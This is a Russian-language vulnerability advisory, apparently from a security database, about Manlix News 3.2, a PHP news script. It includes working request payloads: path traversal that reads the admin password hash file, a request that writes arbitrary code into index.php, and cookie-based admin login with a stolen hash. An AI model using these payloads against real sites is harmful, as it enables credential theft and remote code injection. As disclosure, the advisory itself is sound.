Несколько уязвимостей в Mantix news

Дата публикации:
08.08.2004
Всего просмотров:
1699
Опасность:
Критическая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: Manlix News 3.2

Описание: Несколько уязвимостей в Mantix news позволяют удаленному пользователю просматривать произвольные файлы на сервере, изменять произвольные локальные файлы и получить административный доступ к приложению.

1. Просмотр произвольных файлов на сервере:

http://127.0.0.1/index?news_section=../admins.inc.dat - получаем хеш пароля админа.
2. Изменение локальных файлов (в системе администратирования): http://127.0.0.1/admin.php?section=0_0¤t_section=../../index.php - добавление в файл index.php произвольного кода

3. Возможность получения доступа к системе администратирования по хешу и логину.

GET /admin.php?section=0_0¤t_section=[куда пишем]&day=01&month=01&year=2004&hour=03&minute=00&second=00&news=[что пишем]&add_news=ok HTTP/1.1
Host: [хост]
Cookie: manlix_news_login=[логин]; manlix_news_password=[хеш пароля]

Пример/Эксплоит: См. ниже

URL производителя: http://www.manlix.ru

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: Exploit:

или введите имя

CAPTCHA